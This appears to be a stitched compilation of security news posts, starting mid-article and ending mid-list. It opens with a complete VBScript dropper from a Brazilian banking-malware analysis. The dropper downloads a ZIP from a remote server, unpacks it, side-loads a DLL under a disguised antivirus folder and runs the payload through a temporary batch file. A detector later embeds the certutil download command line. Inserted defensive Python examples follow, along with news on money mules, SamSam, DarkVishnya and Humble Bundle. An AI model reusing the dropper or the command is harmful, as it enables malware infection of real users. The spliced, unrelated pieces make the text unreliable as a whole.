ubase = "https://remoteserver/turbulencianoar/AuZwaaU.zip"
randname = getrandomstring()
exerandom = "AV product.SystrayStartTrigger-" + randname
filezip = "AuZwaaU.zip"
deffolder = "C:\AV product_" + randname + "\"
' Marker file in %TEMP%, disguised as a Java installer log, stops the script from running twice
filesuccess = objShell.ExpandEnvironmentStrings("%TEMP%") + "\java_install.log"
fileexe = "AuZwaaU.exe"
filedll = "AuZwaaU.sys"

Set objFSO = CreateObject("Scripting.FileSystemObject")

If (objFSO.FileExists(filesuccess)) Then
    WScript.Quit
End If

If Not (objFSO.FileExists(filezip)) Then
    ' Write the marker first, then fetch the archive over HTTP and save it to %TEMP% via ADODB.Stream
    Set objFile = objFSO.CreateTextFile(filesuccess, True)
    objFile.Write " "
    objFile.Close

    'WScript.Echo msg
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", ubase, False
    xHttp.Send

    With bStrm
        .type = 1
        .open
        .write xHttp.responseBody
        .savetofile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filezip, 2
    End With

    WScript.Sleep 5000

    ' Unpack the archive with the Shell.Application COM object and delete the ZIP
    Set objShellApp = CreateObject("Shell.Application")
    Set FilesInZip = objShellApp.NameSpace(objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filezip).items
    objShellApp.NameSpace(objShell.ExpandEnvironmentStrings("%TEMP%")).CopyHere(FilesInZip)

    WScript.Sleep 5000
    objFSO.DeleteFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filezip

    ' Move the legitimate AV binary, the malicious DLL (shipped as .sys) and the runtime DLLs into the drop folder
    objFSO.CreateFolder deffolder
    WScript.Sleep 3000
    objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & fileexe, deffolder & exerandom & ".exe"
    objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & filedll, deffolder & "AV product.OE.NativeCore.dll"
    objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\msvcp120.sys", deffolder & "msvcp120.dll"
    objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\msvcr120.sys", deffolder & "msvcr120.dll"
    objFSO.MoveFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\LOG", deffolder & "LOG"

    WScript.Sleep 5000

    ' Launch the poisoned binary (which side-loads the DLL) through a throwaway batch file, then remove it
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objShell = CreateObject("WScript.Shell")
    outFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & randname & ".bat"
    Set objFile = objFSO.CreateTextFile(outFile, True)
    objFile.Write "@echo off" & vbCrLf
    objFile.Write "@cd " & deffolder & vbCrLf
    objFile.Write "start " & exerandom & ".exe" & vbCrLf
    objFile.Close

    objShell.Exec(objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & randname & ".bat")
    WScript.Sleep 10000
    objFSO.DeleteFile objShell.ExpandEnvironmentStrings("%TEMP%") & "\" & randname & ".bat"

    Set objShell = Nothing
    Set objFSO = Nothing
    Set objShellApp = Nothing
End If

' Builds the random alphabetic suffix used in the folder and executable names
Function getrandomstring()
    Dim intMax, k, intValue, strChar, strName
    Const Chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

    intMax = 6
    Randomize()
    strName = ""

    For k = 1 To intMax
        intValue = Fix(62 * Rnd())
        strChar = Mid(Chars, intValue + 1, 1)
        Randomize()
        intValue = Fix(62 * Rnd())
        strChar = strChar & Mid(Chars, intValue + 1, 1)
        strName = strName & strChar
        If (k < 6) Then
            strName = strName & ""
        End If
    Next

    getrandomstring = strName
End Function
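A defender-side check for the LNK-to-certutil-to-VBS chain walked through in the two sections above, written here as an added example (it is not IBM X-Force's code). It runs pattern checks over constructed process-creation and file-creation events modelled on the command line, drop-folder naming pattern and java_install.log marker quoted in the analysis; the event field names, the sample values and the "AV product" placeholder vendor name are assumptions.

```python
"""Detect the remote overlay dropper chain from host telemetry.

Added example, not the project's code. Events are constructed to mirror the
LNK command line, the "C:\\AV product_<random>\\" drop folder and the fake
java_install.log marker described in the analysis above.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" (command line) or "file" (created path)
    cmdline: str = ""    # full command line for process events (assumed field)
    path: str = ""       # created file path for file events (assumed field)


# certutil used as a downloader: -urlcache together with -split -f and a URL.
CERTUTIL_DOWNLOAD = re.compile(
    r"certutil(?:\.exe)?\s.*-urlcache\b.*-split\b.*-f\b.*https?://", re.I)
# A downloaded .txt renamed to .vbs within the same command line.
TXT_TO_VBS = re.compile(r'\brename\s+"?[^"\s]+\.txt"?\s+"?[^"\s]+\.vbs', re.I)
# cmd /k or /c handing a .vbs straight to the script host, as the LNK does.
CMD_RUNS_VBS = re.compile(r"cmd(?:\.exe)?\s+/[kc]\s+\S+\.vbs\b", re.I)
# Drop folder "<drive>:\AV product_" + random alphabetic suffix + "\".
DROP_DIR = re.compile(r"^[A-Z]:\\AV product_[A-Za-z]+\\", re.I)
# The run-once marker the VBS writes into %TEMP%, disguised as a Java log.
MARKER = re.compile(r"\\Temp\\java_install\.log$", re.I)


def score_event(ev):
    """Return the indicator names matched by one event, in check order."""
    hits = []
    if ev.kind == "process":
        if CERTUTIL_DOWNLOAD.search(ev.cmdline):
            hits.append("certutil_urlcache_download")
        if TXT_TO_VBS.search(ev.cmdline):
            hits.append("txt_renamed_to_vbs")
        if CMD_RUNS_VBS.search(ev.cmdline):
            hits.append("cmd_executes_vbs")
    elif ev.kind == "file":
        if DROP_DIR.match(ev.path):
            hits.append("remote_overlay_drop_dir")
        if MARKER.search(ev.path):
            hits.append("fake_java_install_marker")
    return hits


def detect(events):
    """Correlate a batch of events; alert when at least two distinct
    indicators of the chain are present, so a lone certutil download
    (which has legitimate admin uses) does not fire by itself."""
    indicators = set()
    for ev in events:
        indicators.update(score_event(ev))
    verdict = "alert" if len(indicators) >= 2 else "clean"
    return verdict, sorted(indicators)


# Constructed sample telemetry for an infected host ("remoteserver" and the
# random suffix "kQzTwa" are placeholders, as in the analysis).
SAMPLE_EVENTS = [
    Event("process", cmdline=(
        r'C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f '
        r'"https://remoteserver/turbulencianoar/tudodebom.txt" '
        r'%temp%\tudodebom.txt && cd %temp% && rename "tudodebom.txt" '
        r'"JNSzlEYAIubkggX.vbs" && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs')),
    Event("file", path=r"C:\Users\user\AppData\Local\Temp\java_install.log"),
    Event("file", path=r"C:\AV product_kQzTwa\AV product.OE.NativeCore.dll"),
]

# Constructed benign telemetry: a legitimate certutil invocation and an
# unrelated installer log, neither of which should raise an indicator.
BENIGN_EVENTS = [
    Event("process", cmdline=r"certutil.exe -verify -urlfetch C:\certs\server.cer"),
    Event("file", path=r"C:\Program Files\Java\install.log"),
]

if __name__ == "__main__":
    for name, batch in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        verdict, found = detect(batch)
        print(f"{name}: {verdict} {found}")
```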

Remote Overlay Images

Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.

To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and to confirm the user’s security with a fresh one-time password from their tokenization method.

Figure 1: Fake overlay screen asks users to provide information about their identity.

Figure 2: Fake overlay screen asks users to submit a token code.

Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:

Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.

Mitigate Financial Cybercrime Risks

Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.


The post The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime appeared first on Security Intelligence.

Europol identified 1504 money mules under EMMA 4 operation

Europol announced the arrest of 168 people under the European Money Mule Action ‘EMMA 4’, a massive operation that resulted in the identification of 1,504 money mules.

Europol announced that 168 people have been arrested under EMMA 4, an international operation conducted by law enforcement. EMMA 4 ran from September to November 2018, and law enforcement in 30 states identified 140 money mule organizers.

Europol opened 837 criminal investigations, many of which are still ongoing, and law enforcement made arrests in 20 states. The operation saw the participation of Europol, Eurojust, the European Banking Federation, and law enforcement from Austria, Belgium, Bulgaria, Croatia, Czech Republic, Denmark, Estonia, Finland, France, Greece, Germany, Hungary, Ireland, Italy, Latvia, Lithuania, Malta, Netherlands, Poland, Portugal, Romania, Slovenia, Spain, Sweden, Australia, Moldova, Norway, Switzerland, the United Kingdom and the United States.

The operation aimed at dismantling money laundering activities, in particular tackling ‘money mule’ rings, which play a crucial role in the criminal activity. Global and European banks provided essential support to EMMA 4: Europol reported the participation of over 300 banks, 20 bank associations, and other financial institutions. The financial organizations helped report 26,376 fraudulent money mule transactions, preventing a total loss of €36.1 million ($41.1 million).

Money mules are essential for cashing out the proceeds of criminal activities: they transfer stolen funds between the accounts used to launder the money.

“Money mules are individuals who, often unwittingly, have been recruited by criminal organisations as money laundering agents to hide the origin of ill-gotten money.” reads the press release published by Europol.

“Tricked by the promise of easy money, mules transfer stolen funds between accounts, often in different States, on behalf of others and are usually offered a share of the funds that pass through their own accounts.”

Criminal organizations usually recruit money mules among newcomers to a country or people who are unemployed or in economic distress. Unfortunately, the number of young people recruited as money mules is increasing; criminals reach them through social media, fake job advertisements or get-rich-quick posts.

Young recruits often do not realize that moving funds from one account to another on someone else’s behalf is a crime.

“To raise awareness of this type of fraud, the money muling awareness campaign #DontBeAMule kicks off today across Europe. With awareness-raising material, available for download in 25 languages, the campaign will inform the public about how these criminals operate, how they can protect themselves and what to do if they become a victim.” concludes the press release.

“For the next week, international partners from law enforcement and judicial authorities, together with financial institutions, will be supporting the campaign at national level.”

Pierluigi Paganini

(Security Affairs – money mules, EMMA 4)

The post Europol identified 1504 money mules under EMMA 4 operation appeared first on Security Affairs.

Banks Attacked through Malicious Hardware Connected to the Local Network

Kaspersky is reporting on a series of bank hacks -- called DarkVishnya -- perpetrated through malicious hardware being surreptitiously installed into the target network:

In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company's local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization's building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals' abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

Slashdot thread.
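The entry-point problem the quoted report describes, a planted box that simply shows up as one more DHCP client, is tractable if you diff what the network sees against what you own. As an added example that is not part of Schneier's post or Kaspersky's research, the Python below parses a constructed dnsmasq-style lease file, looks up each MAC's OUI in a small constructed vendor table (b8:27:eb is the Raspberry Pi Foundation's registered prefix; the other entries are placeholders) and reports any address missing from a constructed inventory, escalating single-board-computer vendors. Inventory, OUI table and leases are all constructed here; in practice the observed side comes from DHCP leases, ARP tables or a switch's MAC address table and the inventory from a CMDB or NAC system.

```python
"""Flag devices on a LAN segment that are not in the asset inventory.

Added example, not code from Schneier's post or Kaspersky's research. The
inventory, OUI table and lease lines are constructed for the example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed inventory: MAC address -> expected hostname.
INVENTORY: dict[str, str] = {
    "00:50:56:aa:01:02": "fs01",
    "3c:52:82:11:22:33": "print-2f",
    "a4:5e:60:44:55:66": "wkst-0147",
}

# Constructed OUI table. b8:27:eb is the Raspberry Pi Foundation's registered
# prefix; the other entries are placeholders for the example.
OUI_VENDORS: dict[str, str] = {
    "b8:27:eb": "Raspberry Pi Foundation",
    "00:50:56": "VMware",
    "3c:52:82": "Hewlett Packard",
    "a4:5e:60": "Apple",
}
# Vendors whose hardware is cheap enough to plant and walk away from.
SINGLE_BOARD_VENDORS = {"Raspberry Pi Foundation"}

# Constructed dnsmasq-style lease lines: expiry MAC IP hostname client-id
LEASES = """\
1544000001 00:50:56:aa:01:02 10.20.1.10 fs01 *
1544000120 3c:52:82:11:22:33 10.20.1.31 print-2f *
1544000130 a4:5e:60:44:55:66 10.20.1.57 wkst-0147 01:a4:5e:60:44:55:66
1544000400 b8:27:eb:9c:de:f0 10.20.1.88 raspberrypi 01:b8:27:eb:9c:de:f0
1544000405 f0:de:f1:12:34:56 10.20.1.89 * *
"""

LEASE_RE = re.compile(r"^(\d+)\s+([0-9a-f:]{17})\s+(\S+)\s+(\S+)\s+(\S+)$", re.I)


@dataclass(frozen=True)
class Finding:
    mac: str
    ip: str
    hostname: str
    vendor: str
    reason: str


def vendor_for(mac: str) -> str:
    """Map the first three octets to a vendor name, or flag an unknown OUI."""
    return OUI_VENDORS.get(mac.lower()[:8], "unknown OUI")


def parse_leases(text: str) -> list[tuple[str, str, str]]:
    """Return (mac, ip, hostname) for each well-formed lease line."""
    entries = []
    for line in text.splitlines():
        m = LEASE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the sweep
        _expiry, mac, ip, host, _client_id = m.groups()
        entries.append((mac.lower(), ip, host))
    return entries


def find_rogues(leases: str, inventory: dict[str, str] = INVENTORY) -> list[Finding]:
    """One Finding per unknown MAC. A known MAC whose hostname changed is
    reported too, since a planted box may clone a printer's address."""
    findings: list[Finding] = []
    for mac, ip, host in parse_leases(leases):
        vendor = vendor_for(mac)
        if mac in inventory:
            if inventory[mac] != host:
                findings.append(Finding(mac, ip, host, vendor,
                                        f"hostname changed from {inventory[mac]}"))
            continue
        reason = "MAC not in inventory"
        if vendor in SINGLE_BOARD_VENDORS:
            reason += "; single-board computer vendor"
        findings.append(Finding(mac, ip, host, vendor, reason))
    return findings


if __name__ == "__main__":
    for f in find_rogues(LEASES):
        print(f"{f.ip:<14} {f.mac}  {f.hostname:<12} {f.vendor:<26} {f.reason}")
```

A MAC-based sweep is only a tripwire: a planted device can clone a known address, which is why the hostname-change check is there, and the durable controls are 802.1X or port security on user-reachable ports plus physical access control over meeting rooms. Note too that a Bash Bunny never appears as a DHCP client; it enumerates on a host as a storage or HID device, so it is caught by endpoint USB device logging, not by this sweep.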

Half of management teams lack awareness about BPC despite increased attacks

Trend Micro revealed that 43 percent of surveyed organizations have been impacted by a Business Process Compromise (BPC). Despite a high incidence of these types of attacks, 50 percent of management teams still don’t know what these attacks are or how their business would be impacted if they were victimized. Most popular filename categories used in malicious attachments (based on VirusTotal samples) In a BPC attack, criminals look for loopholes in business processes, vulnerable systems … More

The post Half of management teams lack awareness about BPC despite increased attacks appeared first on Help Net Security.

Attention Red Dead Redemption 2 Players: Dodge This New Download Scam

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process.  The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging personal information, leaving it at the cybercriminal’s disposal. What’s more, the scammer earns affiliate revenue for every completed survey.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

DHS and FBI published a joint alert on SamSam Ransomware

The US Department of Homeland Security (DHS) and the FBI issued a joint alert on SamSam attacks targeting critical infrastructure.

The US Department of Homeland Security (DHS) and the FBI published a joint alert on the activity associated with the infamous SamSam ransomware.

The SamSam operators have extorted over 200 organizations, including public institutions, municipalities, and hospitals, causing over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection interrupted several of the city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the Port of San Diego in September; the incident impacted the processing of park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), which shut down the infected workstations.

In August, the security firm Sophos published a report on the SamSam ransomware. Its experts tracked Bitcoin addresses managed by the crime gang and discovered that the crooks had extorted nearly $6 million from victims since December 2015, when the ransomware first appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015. 74% of the known victims are based in the United States. Other regions known to have suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses found in all the SamSam versions it has spotted and discovered that 233 victims paid a total of $5.9 million. The security firm also estimated that the group is netting around $300,000 per month.

A few days ago, the U.S. DoJ charged two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), over their alleged role in creating and spreading the infamous SamSam ransomware.

According to the joint report, most of the victims were located in the United States.

“The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally.” reads the alert.

“Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.”

SamSam actors leverage vulnerabilities in Windows servers to gain persistent access to the target network and then move laterally to infect other hosts on the network.

According to the alert, the actors have used the JexBoss Exploit Kit to compromise vulnerable JBoss application servers, and Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks, breaking in with brute-force attacks and stolen credentials.

After obtaining access to the victim’s network, attackers escalate privileges then they drop and execute the malware.

“After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.” continues the alert.

According to the alert, the attackers also used stolen RDP credentials bought on darknet marketplaces, sometimes within hours of purchasing them.

The alert also provides technical details and the following recommendations to mitigate the threat:

  • Audit your network for systems that use RDP for remote communication. Disable the service if it is not needed, or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
  • Enable strong passwords and account lockout policies to defend against brute force attacks.
  • Where possible, apply two-factor authentication.
  • Regularly apply system and software updates.
  • Maintain a good back-up strategy.
  • Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure that third parties that require RDP access follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
  • Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
  • Restrict users’ ability (permissions) to install and run unwanted software applications.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
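What the logging recommendation buys you in practice, as an added example that is not part of the alert or of the Security Affairs post: a detector over Windows Security events 4625 (failed logon) and 4624 (successful logon) restricted to logon type 10 (RemoteInteractive, i.e. RDP). It raises a medium alert when one source address accumulates a run of failures inside a sliding window, and a high alert when a success follows that run or arrives from outside RFC 1918 space, which is the pattern the alert describes for bought or brute-forced credentials. The event records below are constructed to resemble those fields, and the threshold and window are assumptions to tune.

```python
"""Detect RDP password guessing from Windows Security log events.

Added example, not part of the DHS/FBI alert or the Security Affairs post.
The records below are constructed to resemble the fields of event ID 4625
(failed logon) and 4624 (successful logon); logon type 10 is RemoteInteractive,
i.e. RDP. Threshold and window are assumptions to tune for your environment.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed events: time, event id, logon type, target user, source address.
EVENTS = [
    {"time": "2018-11-20T02:14:01", "id": 4625, "logon_type": 10, "user": "administrator", "src": "203.0.113.7"},
    {"time": "2018-11-20T02:14:03", "id": 4625, "logon_type": 10, "user": "admin", "src": "203.0.113.7"},
    {"time": "2018-11-20T02:14:04", "id": 4625, "logon_type": 10, "user": "backup", "src": "203.0.113.7"},
    {"time": "2018-11-20T02:14:06", "id": 4625, "logon_type": 10, "user": "svc_backup", "src": "203.0.113.7"},
    {"time": "2018-11-20T02:14:07", "id": 4625, "logon_type": 10, "user": "svc_backup", "src": "203.0.113.7"},
    {"time": "2018-11-20T02:14:09", "id": 4625, "logon_type": 10, "user": "svc_backup", "src": "203.0.113.7"},
    {"time": "2018-11-20T02:14:12", "id": 4624, "logon_type": 10, "user": "svc_backup", "src": "203.0.113.7"},
    {"time": "2018-11-20T08:02:10", "id": 4625, "logon_type": 10, "user": "jdoe", "src": "10.0.5.21"},  # one typo
    {"time": "2018-11-20T08:02:25", "id": 4624, "logon_type": 10, "user": "jdoe", "src": "10.0.5.21"},
    {"time": "2018-11-20T09:00:00", "id": 4624, "logon_type": 2, "user": "jdoe", "src": "-"},  # console, ignored
]


@dataclass(frozen=True)
class Alert:
    severity: str
    src: str
    reason: str


def is_external(src: str) -> bool:
    """True for a routable source outside RFC 1918 space. Unparsable sources
    such as '-' (local logons) are treated as internal."""
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return False
    return not any(ip in net for net in RFC1918)


def detect(events, threshold: int = 5, window: timedelta = timedelta(minutes=10)) -> list[Alert]:
    """Sliding-window failure counter per source address.

    medium: `threshold` or more RDP failures from one source inside `window`
    high:   a successful RDP logon that follows such a run, or one that comes
            from outside RFC 1918 space at all
    """
    failures: dict[str, deque[datetime]] = defaultdict(deque)
    fired: set[str] = set()
    alerts: list[Alert] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != RDP_LOGON_TYPE:
            continue
        ts = datetime.fromisoformat(ev["time"])
        src = ev["src"]
        recent = failures[src]
        while recent and ts - recent[0] > window:
            recent.popleft()
        if not recent:
            fired.discard(src)  # a quiet window resets the one-alert-per-run guard
        if ev["id"] == 4625:
            recent.append(ts)
            if len(recent) >= threshold and src not in fired:
                fired.add(src)
                alerts.append(Alert("medium", src, f"{len(recent)} failed RDP logons within {window}"))
        elif ev["id"] == 4624:
            if len(recent) >= threshold:
                alerts.append(Alert("high", src, f"RDP logon as {ev['user']} after {len(recent)} failures"))
            if is_external(src):
                alerts.append(Alert("high", src, f"RDP logon as {ev['user']} from non-RFC1918 address"))
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a.severity}] {a.src}: {a.reason}")
```

Run over the 90 days of logs the alert asks you to retain, the "success after a run of failures from an external address" case is the one to page on. One caveat from Windows itself rather than from the alert: when Network Level Authentication is enabled, failed RDP attempts are typically recorded with logon type 3 rather than 10, so a production version should also count type 3 failures against hosts that expose RDP.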

Pierluigi Paganini

(Security Affairs – SamSam ransomware, hacking)

The post DHS and FBI published a joint alert on SamSam Ransomware appeared first on Security Affairs.

House GOP Campaign Arm Targeted by ‘Unknown Entity’ in 2018

Thousands of emails were stolen from aides to the National Republican Congressional Committee during the 2018 midterm campaign, a major breach exposing vulnerabilities that have kept cybersecurity experts on edge since the 2016 presidential race.


Humble Bundle alerts customers to subscription reveal bug

You’ll want to check your mailbox if you have a Humble Bundle account, as they’re notifying some customers of a bug used to gather subscriber information.

Image: bug notice email

The mail reads as follows:

Hello,

Last week, we discovered someone using a bug in our code to access limited non-personal information about Humble Bundle accounts. The bug did not expose email addresses, but the person exploited it by testing a list of email addresses to see if they matched a Humble Bundle account. Your email address was one of the matches.

Now, this is the part of a breach/bug mail where you tend to say “Oh no, not again” and take a deep breath. Then you see how much of your personal information winged its way to the attacker.

Oh no, not again

For once, your name, address, and even your login details are apparently in safe hands. Either this bug didn’t expose as much as the attacker was hoping for, or they were just in it for the niche content collection.

The email continues:

Sensitive information such as your name, billing address, password, and payment information was NOT exposed. The only information they could have accessed is your Humble Monthly subscription status. More specifically, they might know if your subscription is active, inactive, or paused; when your plan expires; and if you’ve received any referral bonuses.

I should explain at this point. You can buy standalone PC games on the Humble store, or whatever book, game, or other collection happens to be on offer this week. Alternatively, you can sign up to the monthly subscription. With this, you pay and then every month you’re given a random selection of video game titles. They may be good, bad, or indifferent. You might already own a few, in which case you may be able to gift them to others. If you have no interest in the upfront preview titles, you can temporarily pause your subscription for a month.

This is the data that the bug exploiter has obtained, which is definitely an odd and specific thing to try and grab.
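The bug as described is an enumeration oracle: an endpoint that, given an email address, responds differently depending on whether an account exists, so a list of addresses can be replayed against it. As an added example that is not Humble Bundle's code, the Python below shows a constructed vulnerable lookup and the replay against it, then a hardened version in which subscription status is readable only by the authenticated owner (there is no email parameter at all) and the one unauthenticated email-keyed action answers identically for known and unknown addresses and is rate limited per client. Endpoint names, the subscriber store and the addresses are all constructed.

```python
"""An account-enumeration oracle of the kind described above, next to a fix.

Added example, not Humble Bundle's code. The endpoint names, the subscriber
store and the addresses are constructed for the example.
"""
from __future__ import annotations

import secrets
from collections import defaultdict
from typing import Callable

# Constructed subscriber store: email -> subscription fields.
SUBSCRIBERS = {
    "alice@example.com": {"status": "active", "expires": "2019-01-31"},
    "bob@example.com": {"status": "paused", "expires": "2019-02-28"},
}
OUTBOX: list[str] = []  # stands in for a mail queue


def lookup_vulnerable(email: str) -> dict:
    """Answers differently for known and unknown addresses. The difference in
    status code (or body, or timing) is the oracle, and no login is needed."""
    sub = SUBSCRIBERS.get(email.lower())
    if sub is None:
        return {"code": 404, "body": {"error": "no such account"}}
    return {"code": 200, "body": dict(sub)}


def enumerate_accounts(candidates: list[str], endpoint: Callable[[str], dict]) -> list[str]:
    """What the attacker did: replay an address list and keep the matches."""
    return [e for e in candidates if endpoint(e)["code"] == 200]


class HardenedApi:
    """Subscription data is served only to the authenticated owner; the
    unauthenticated path gives one fixed answer and is rate limited."""

    def __init__(self, limit: int = 20):
        self.limit = limit
        self.hits: dict[str, int] = defaultdict(int)  # per-client counter (a real one is time-windowed)
        self.sessions: dict[str, str] = {}            # session token -> email

    def issue_session(self, email: str) -> str:
        """Stands in for login: only called after password and 2FA succeed."""
        token = secrets.token_urlsafe(32)
        self.sessions[token] = email.lower()
        return token

    def my_subscription(self, token: str) -> dict:
        """No email parameter at all: the caller can only read their own row."""
        email = self.sessions.get(token)
        if email is None:
            return {"code": 401, "body": {"error": "sign in required"}}
        return {"code": 200, "body": dict(SUBSCRIBERS.get(email, {"status": "none", "expires": None}))}

    def send_referral(self, email: str, client_ip: str) -> dict:
        """Unauthenticated action keyed by email. Do the work only when the
        account exists, but answer identically either way."""
        self.hits[client_ip] += 1
        if self.hits[client_ip] > self.limit:
            return {"code": 429, "body": {"error": "too many requests"}}
        if email.lower() in SUBSCRIBERS:
            OUTBOX.append(email.lower())
        return {"code": 202, "body": {"message": "if that address has an account, we have emailed it"}}


if __name__ == "__main__":
    probe = ["alice@example.com", "carol@example.com", "bob@example.com"]
    print("vulnerable:", enumerate_accounts(probe, lookup_vulnerable))
    api = HardenedApi(limit=3)
    print("hardened:  ", enumerate_accounts(probe, lambda e: api.send_referral(e, "198.51.100.9")))
```

Identical status codes are necessary but not sufficient: if the existing-account branch does measurably more work (queueing mail, a slower database path), the oracle survives as a timing difference, so that work should be handed to a background job. Per-client rate limiting is a brake rather than a fix, since an attacker can spread a list across many source addresses.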

Security advice from Humble Bundle

Let’s go back to the email at this point:

Even though the information revealed is very limited, we take customer trust very seriously and wanted to promptly disclose this to you. We want to make sure you are able to protect yourself should someone use the information gathered to pose as Humble Bundle.

As a reminder, here are some tips to keep your account private and safe:

  • Don’t share your password, personal details, or payment information with anyone. We will NEVER ask for information like that.
